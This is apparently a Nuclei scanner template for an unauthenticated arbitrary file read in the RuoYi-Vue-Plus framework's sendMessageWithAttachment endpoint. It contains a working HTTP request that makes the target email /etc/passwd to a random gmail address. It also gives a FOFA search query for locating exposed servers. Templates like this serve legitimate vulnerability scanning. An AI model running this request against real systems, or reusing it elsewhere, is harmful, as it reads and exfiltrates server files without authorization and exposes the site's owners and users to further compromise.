http:
    - matchers:
        - condition: and
          part: body
          type: word
          words:
            - '"操作成功"'
            - '"msg":'
            - '"code":'
            - "200"
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          GET /demo/mail/sendMessageWithAttachment?to={{username}}@gmail.com&subject=Test-Mail&text=This%20is%20a%20test%20message&filePath=/etc/passwd  HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
id: RuoYi-sendMessageWithAttachment-File-reading
info:
    author: Superhero
    description: |-
        fofa: body="RuoYi-Vue-Plus后台管理框架"
        若依框架 sendMessageWithAttachment 接囗处存在任意文件读取漏洞,未经身份验证的远程攻击者通过漏洞可以获取到服务器敏感信息，导致系统处于极不安全的状态。
    name: 若依框架 sendMessageWithAttachment 任意文件读取漏洞
    reference:
        - https://mp.weixin.qq.com/s/vYKU43X-RFW1TsCi74QEQQ
    severity: high
    tags:
        - File reading
        - vue
        - 若依
variables:
    username: '{{to_lower(rand_base(12))}}'
